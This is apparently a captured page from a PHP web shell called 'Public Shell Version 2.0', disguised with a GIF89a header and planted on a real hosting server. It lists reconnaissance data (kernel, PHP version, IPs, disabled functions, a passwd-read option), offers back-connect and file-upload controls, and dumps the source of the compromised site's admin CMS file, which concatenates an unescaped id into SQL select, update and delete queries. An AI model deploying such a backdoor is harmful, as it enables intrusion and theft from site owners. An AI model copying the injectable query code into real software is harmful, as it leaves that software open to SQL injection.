GIF89a

Public Shell


Uname : Linux hlpi1ws-c319s07.ad.aruba.it 5.15.0-130-generic #140-Ubuntu SMP Wed Dec 18 17:59:53 UTC 2024 x86_64
PHP Version : 5.3.29
Server Admin : postmaster@www.giancio.com
Server IP : 192.168.3.109 Your IP : 18.188.15.246
Safe Mode : Safe Mode is OFF
Read etc/passwd : Disabled Functions : PHP INFO
Back Connect
IP : PORt :
'; Public Shell Version 2.0
Disable Functions: system,popen,dl,passthru,proc_open,shell_exec
Current Path : /web/htdocs/www.giancio.com/home/admin/function/
File Upload :
Current File : /web/htdocs/www.giancio.com/home/admin/function/posizioni.php

<?php
function listaps() {

	global $conn, $id;
	$output = 	'<div class="row">
					<div class="col-md-6">
						<div class="headline">
							<h3>' . LISTA . ' ' . PS . '</h3> 
						</div>
					</div>					 
					<div class="col-md-6"> 
						<a href="?azione=inseriscips" class="btn btn-default pull-right"><i class="icon-plus"></i> Inserisci</a>
					</div>			
				</div>'; 
		

	$output .= '<div class="row">		
					<div class="col-md-12">
   
				    		<table class="table table-striped" id="tab" > 
				      			<thead>
									<tr>
									    <th></th>	
									    <th>Titolo</th>	
									    <th>Descrizione</th>	
									    <th width="5%"></th>
									    <th width="5%"></th>		  							    
									</tr>
								</thead>
				      			<tbody>';
			      							
			$result=mysql_query('select * from posizioni order by ps_id ASC');
			  while($row=mysql_fetch_assoc($result))

					  
			  {

		$output.='<tr>
					<td>'.$row['ps_id'].'</td>
					<td>'.$row['ps_titolo'].'</td>
					<td>'.$row['ps_desc'].'</td>
					<td><a title="Modifica" href="?azione=modificaps&id='.$row['ps_id'].'"><i class="icon-edit"></i></a></td>
					<td><a title="Elimina" href="?azione=eliminaps&id='.$row['ps_id'].'"><i class="icon-remove-sign"></i></a></td>';                                                         		  
		$output.='</tr>';	
				}

	$output.='</tbody></table></div></div>';
	return ($output);	

	
}


function inseriscips() {
	global $conn, $id;	
	$output = '<div class="row">
					<div class="col-md-10">
						<div class="headline">
							<h3>'.ADD.' '.PS.' </h3>
						</div>
					</div> 
					
					<div class="col-md-2">
						<a class="btn btn-default pull-right" href="javascript:history.back()"><i class="icon-reply"></i> Torna indietro</a>
					</div>

				</div>';

	$output .= '<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=salvaps&id=' . $id . '" method="post">
				<div class="row">
					<div class="col-md-4">
						<label>Titolo</label>
						<input class="form-control" type="text" placeholder="Type something…" name="titolo">
					</div>
					<div class="col-md-4">
						<label>Titolo [English]</label>
						<input class="form-control" type="text" placeholder="Type something…" name="titolo_en">
					</div>
					
				</div>	
				<br />
				<div class="row">
					<div class="col-md-4">
						<label>Descrizione</label>
						<textarea class="span16 border-radius-none" rows="8" name="desc"></textarea>

					</div>
					<div class="col-md-4">
						<label>Descrizione [English]</label>
						<textarea class="span16 border-radius-none" rows="8" name="desc_en"></textarea>

					</div>
				</div>	
				<br />
				<button class="btn btn-default" type="submit">Salva</button>
				<br /><br />
				</form>';

	return ($output);

}



function modificaps() {
	global $conn, $id;
	$sql = 'select * from posizioni where ps_id="' . $id . '"  ';
	$dati_pages = mysql_query($sql) or die(mysql_error());
	$array_pages = mysql_fetch_array($dati_pages);

	$sql_en = 'select * from posizioni_en where ps_id="' . $id . '"  ';
	$dati_pages_en = mysql_query($sql_en) or die(mysql_error());
	$array_pages_en = mysql_fetch_array($dati_pages_en);

	$output = '<div class="row">
					<div class="col-md-10">
						<div class="headline">
							<h3>'.MOD.' '.PS.' </h3>
						</div>
					</div> 
					
					<div class="col-md-2">
						<a class="btn btn-default pull-right" href="javascript:history.back()"><i class="icon-reply"></i> Torna indietro</a>
					</div>

				</div>';

	$output .= '<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=salvaps&id=' . $id . '" method="post">
				<div class="row">
					<div class="col-md-4">
						<label>Titolo</label>
						<input class="form-control" type="text" placeholder="Type something…" name="titolo" value="'.$array_pages[ps_titolo].'">
					</div>
					<div class="col-md-4">
						<label>Titolo [English]</label>
						<input class="form-control" type="text" placeholder="Type something…" name="titolo_en" value="'.$array_pages_en[ps_titolo].'">
					</div>
					
				</div>	
				<br />
				<div class="row">
					<div class="col-md-4">
						<label>Descrizione</label>
						<textarea class="span16 border-radius-none" rows="8" name="desc">'.$array_pages[ps_desc].'</textarea>
					</div>
					<div class="col-md-4">
						<label>Descrizione [English]</label>
						<textarea class="span16 border-radius-none" rows="8" name="desc_en">'.$array_pages_en[ps_desc].'</textarea>
					</div>
				</div>	
				<br />
				<button class="btn btn-default" type="submit">Salva</button>
				<br /><br />
				</form>';

	return ($output);

}

function salvaps() {
	global $conn, $id;
	$errore = 0;
	$titolo = mysql_real_escape_string($_POST['titolo']);
	$desc = mysql_real_escape_string($_POST['desc']); 

	$titolo_en = mysql_real_escape_string($_POST['titolo_en']);
	$desc_en = mysql_real_escape_string($_POST['desc_en']);

	if ($errore == 0) {
		if ($id == 0) {
			$sql = 'insert into posizioni(ps_titolo, ps_desc) values("' . $titolo . '","' . $desc . '")';
			mysql_query($sql, $conn) or die(mysql_error());
			$sql = 'insert into posizioni_en(ps_titolo, ps_desc) values("' . $titolo_en . '","' . $desc_en . '")';
			mysql_query($sql, $conn) or die(mysql_error());
			header('location: cms.php?ins&azione=listaps');
			$id = mysql_insert_id();
		} else {
			$sql = 'update posizioni set ps_titolo="' . $titolo . '", ps_desc="' . $desc . '" where ps_id="' . $id . '" ';
			mysql_query($sql, $conn) or die(mysql_error());
			$sql = 'update posizioni_en set ps_titolo="' . $titolo_en . '", ps_desc="' . $desc_en . '" where ps_id="' . $id . '" ';
			mysql_query($sql, $conn) or die(mysql_error());
			header('location: cms.php?agg&azione=listaps');

		}

	} else {$output = 'errore nel form.<br /><a href="javascript:history.go(-1)">Torna indietro</a>';
	}
	return ($output);
}



function eliminaps() {
	global $conn, $id;
	$sql = 'delete from posizioni where ps_id="' . $id . '"';
	mysql_query($sql) or die(mysql_error());

	$sql_en = 'delete from posizioni_en where ps_id="' . $id . '"';
	mysql_query($sql_en) or die(mysql_error());

	header('location: cms.php?del&azione=listaps');
}



?>

Public Shell Version 2.0